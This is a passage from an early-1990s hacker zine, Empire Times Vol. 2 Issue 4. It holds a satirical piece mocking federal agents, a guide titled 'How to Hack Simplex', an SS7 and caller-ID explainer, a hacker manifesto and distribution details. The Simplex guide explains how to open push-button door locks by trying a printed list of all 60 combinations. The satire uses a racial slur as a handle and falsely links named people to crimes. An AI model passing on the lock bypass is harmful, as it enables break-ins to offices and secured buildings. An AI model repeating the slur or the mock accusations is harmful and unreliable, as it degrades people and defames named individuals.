those photos in a secret safe behind my couch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release them when I'll be able to get top dollar.  I've been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hoto of Okinawa with the horse will bring a particular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but that's just between you a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o you're probably wondering what exactly those slimy Feds wa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m gonna tell you that par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rst off, we monitored IRC around the clock.  You guess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quite surpasses a Sunday night with a pot of coffee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abytes of meaningful chatter.  It's no wonder that students today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time on IRC; it's such a learning experience.  You can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from anatomy, to what's the latest in your local hardware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even the current jeopardy score if you're REALLY paying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rong friendships that come about as a result of IRC, le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ose.  Nothing beats a friend who cares about you so much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ouple thousand copies of your email to send to his closest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ondly, we dissected each and every usenet post on group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2600.  We were surprised to find a secret code in each and every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uld even spell out satanic messages when you printed them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, you'll see what I mean.  Incredible stuff.  We kept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who posted the most and on what topic, and of course the ho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.  Anyone who posted something including words like "bomb", "miss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assinate", or "federal" was immediately placed under surveillanc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know how to get the most out of the taxpayer's doll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e also taped all the 2600 meetings.  It was a heck of a lot o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queeze ourselves into the potted plants.  No spandex for us, oh no!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ure that we dressed in ceremonial robes of ambassadors so we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out.  You know how observant those hackers are!  We have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riminating evidence on tape, from people actually talking to C-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h, I thought you knew that was against the law), to Dr. Freeze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in arms reach in a bear hug.  The worst was when some kids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way boxes of chocolate chip cookies.  Those boys are gonna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IME for that, I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ow, onto the part that people always ask about.  Who'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t me first profile Supernigger.  This guy is quite a piece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onfident!  So...pa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s main mistake was having a fit of anger and deciding to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hone line when there were Fed-types in my apartment.  Boy did the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me scream at him when he called to explain what had happe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at we have on him is a tape of him stealing a pack of bubble g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7-11 by his house.  It was pure detective work setting it up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little camera hidden in the earring of the cashier. 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he didn't suspect anything.  And why would he?  He's never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before, so he has no reason to be parano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n there's KL.  Yes, the guy who's on the cover of that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the one who's got something pulled over most of his face.  That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the mark he had on his chin from being hit with the dart of a nerf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ird story, something that happened to him at UUNET.  We nev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o get all the details, even though we had KL tied to a cha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ays.  He's pretty good under those million kilowatt bul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nyways, we caught KL using a scanner to listen in o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of his neighbors.  Yep, he was planning on blackmail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 and using the money to pay off his legal bills.  We caugh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-handed though, and he's agreed to help us out in the future...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I mean...you never know when we might need him to help us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bosses or the local FBI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ot to be forgotten is that John guy.  This was a little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a man who would NEVER break the law.  He even put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e!  But, being brilliantly trained investigators, we soon dis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behind his handle, "Laughing G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r. Lgas' claim to fame is being the local hitman for the DC cro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p, whenever someone can't get their revenge through hacking or ph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o to John.  John's most famous elimination procedure is sh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's head with the front of his car.  His bumpers must be made of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!  Luckily, we only witnessed ten or eleven *SPLATS*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fed him and brought him in to be tortured...err, questioned.  He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questions with peals of laughter, so we had him committed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rom the institution is that he keeps asking for internet access.  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ast but not least is the man we all know and love, the Wing.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ver figure out his handle?  Nope, we don't know.  The way w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f you subtract his age from the year of his birth, then multi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666, and add that to the sum of his name in hexadecimal, i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IP address to a super top secret military base.  We're sti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, because it may have something to do with UFO's.  A young ma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hris Goggans helped us with that little tidbit of information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young man, always trying to do what's right and NEVER think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m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t any rate, the last I heard, the Wing is planning on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s and writing a couple books about the trial that nev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come to think of it, we don't have anything on him.  But i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good story to make people think we do!  Anything to keep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talking, and talking, and talking (dang, you'd think by now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rgotten who I was, but NO!  to this day, my name appear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times in all of our IRC logs...I guess there's nothing else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now that every operating system on the internet is sec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at's all for now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Volume 2, Issue 4, File 6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How to Hack Simplex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by erud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Simplex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Complete Listing &amp; Hack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(x)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 Simplex lock is one of those door locks with the 5 pus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a 3 digit  code.  There are a lot of these  type l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ntagon, (not high access, but for a little added security)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many many office building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kay, Simplex locks are very easy to hack, now think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t use the same # twice in a row,  since it's already push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you can't have the same # twice in one code, because the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ready  registered.  So that would leave 5 option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lection, 4 for the 2nd selection, (you can't do 2 in a ro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3 left for your last selection (since you can't use 2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# in a combo) so that is 5X4X3 which is = to 60. I needed to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a few of these simplex locks and I couldnt find a file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ow to actually "hack" it if you dont know the code.  Since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 do it myself and couldnt find it anywhere, I thought I'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bout it. So what you basically do is either memoriz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then start to manually hack it, or if you arnt a think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n get a mini-cassette  recorder &amp; record your voice sa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ne by one, manually enter them as you play the tape bac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wont miss a combination. (This method is not as time consum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you think if you can enter them fa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hope you can benifit from this text file, Simplex locks ar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 erud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ere are all 60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123    213    312    412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124    214    314    413    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125    215    315    415   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132    231    321    421    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134    234    324    423    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135    235    325    425    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142    241    341    431    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143    243    342    432    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145    245    345    435    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152    251    351    451 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153    253    352    452    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154    254    354    453    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Volume 2, Issue 4, File 7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SS7 and caller ID and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by gren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eep reading things that talk about caller ID and ANI and SS7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eces of the puzzle are always missing.  I decided to try clea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lit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7 is really a complex packet network that links AT&amp;T UNIX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es that run AT&amp;T toll offices and Bell Operating company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) with a series of other UNIX routing processors called STPs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oints) and SCPs (service control points).  STP's are really I/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cessors while SCP's are high speed database serv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s. The SCPs are responsible for synchronizing information abou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, switching offices, call setups and routing (paths) and call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S7 end point (telephone switch) has a unique PC or Point Code so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7 is a CCITT specification and the messages used by i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network are public information.  AT&amp;T started SS7 in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s known as CCIS or "common channel interoffice signalling". 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, MCI and Sprint all use SS7, but many LECs (local exchange carr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rticipate.  Most likely this is because they would hav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witching equipment which would cost big bucks which they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on executive sal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"good ol days", each switch that received a call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through the office either to a line or to a trunk to another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to receive and send call digits and call progress signals.  Since SS7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machines that control the individual physical AT&amp;T toll off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IN CONTROL OF SELECTING THE CALL PATH THROUGH THE OFFICE!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rashes that happen when the system goes down because one nod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r a bug hits them all. The SS7 packet network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1 (1.544mb/s) connections, but lots of it is still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6kb/s links - digital private lines that are hooked up betwee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twork is a system of "link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links connect telephone switches or data bases to STP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 links connect STP pairs in different areas of the country or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links connect mated STP pairs (STP's are duplicated to prevent fail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links interconnect different SS7 networks such as AT&amp;T's and MC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 links connect a telephone switch to an STP in a differen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" links connect telephone switches to other telepho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called associated signa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LECs and IXC's are greedy and since extortion is their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cooperate very well and LEC SS7 networks only talk to IX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exchange carrier) networks like AT&amp;T, MCI and Sprint 'cause the law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o.  ANI (automatic number identification) over SS7 onl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from the LEC to the IXC when a call leaves a LATA.  The IX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it to the distant end L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XCs are therefore the only ones who can provide nation (or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alling party ID and then only if your equipment (PBX)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ir networks. This is why caller ID is anly avail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 areas and even then it may not be able to cross two switching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C's don't often build "F" links among their own switching syste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ften because the software releases of the switching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SS7 compatible.  For example, 1ESS needs generic 1AE10, 5ES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E4.2 and DMS100 (the most popular Northern Tel switch) needs BCS2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outing STPs are most often AT&amp;T 2ASTP's, DSC DEX Megahub (MC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 SuperNodes.  Of course the software on each of these systems is un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is leaves a whole world of UNIX computers out there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.  The more the merrier....  In the future, I'll try to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tructure information about the STPs and SCPs and if any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, leave a note on Digital An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D part about it all is that there is no longer much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nymous" telephone calls.  The Telco's and the Federales can se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connections and identify both you and the other end.  If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, obviously they can also listen to your data and your voi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need to work really hard on systems like encryption and tempn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cket nets to keep our privacy and anony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some notes and let me know what (besides the obvious sh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and numbers and id's and passwords) you need to know. I'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it and keep these short and useful, maybe with a 2 week interv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ssue will look at AUDIX - the most common voice mailbox system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's PB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 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    gren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Volume 2, Issue 4, File 8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Don't tell me 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by erud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ave you ever wondered why?  Have you ever wondered how?  I b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d you had, or tried.  I do, I think, I wonder, I explore, I liv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you come forth to me and ask me for advice.  While now you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 up at the sight of my name, our n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You take me as a man in black, but I won't let that stop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my point.  You fear me, you loth me at the site of my name, our n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you could take me as a individual, or a person you would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when you know my will is good.  When you know I'll advance the wor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re again goes another lifeless kid playing on the compute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e day make good money, no spouse, no where..  "He sits there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out how the machine works, he's probably just wasting he's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, maybe.. That's me, I want to know how it works, I want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get into it.  "Damn Hacker, all he wants to do is put a vir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there, wreck the computer, damn kid, he has no f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d you know the difference? I still to this day have yet to me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hacker who's intentions are malicious, since one who is, is not a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on't let you try to kill my thought processes to try to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 threat to this world, when infact you who doesn't think i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.  Can you imagine a world without hackers now, a whole worl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, going now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tell me I lie, tell me I cheat.  Make your excuses to expl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.  Society's mistakes, Society's whisp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ange our name, and think not what society's thrown upon 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are..  You know they say "If you teach the what to think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0ecome the slave of knowledge, If you teach the how to think, knowled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ir slave."  Think things up not how you are imposed on, w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..  Think things up from what you've found, what you've discov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look upon us in a without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ver again shall you look about me as if I'm the suspect, as if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he felon.  Open your mind, and soak in the knowledge like a spo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rged into the ocean.  You hate my erudition, but that is fine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ne through my share of hardships, oh yes but I won't let that st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ing my poi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pire Times Q &amp;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The Empire Ti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PA] [#]             [System Name]          [System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------   -------------------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1) 384-2482        Empire                 Albat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3) PRIVATE         Digital Anarchy        Arm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49) XXXXXXXXX       Secret Techtonics      Seve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ext.archive.umich.edu    /pub/Zines/Emp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send my Article Submis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il Armitage or Albatross on either Digital Anarch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.  You can also mail them to me personally at armitage@dh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Files do we publi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ublish anything dealing with tellecommunications and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(or lack thereof).  Or anything interesting and or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become a member bo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probably not.  If you wish to distribute Empire Tim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the file is distributed in it's full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"Empire Times Distribution Sites", the thre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are those are run by Armitage, Albatross, and Sevenup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where you can get the Empire Times.  You see, obvious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Empire Times on Empire BBS and Armitage's BBS.. etc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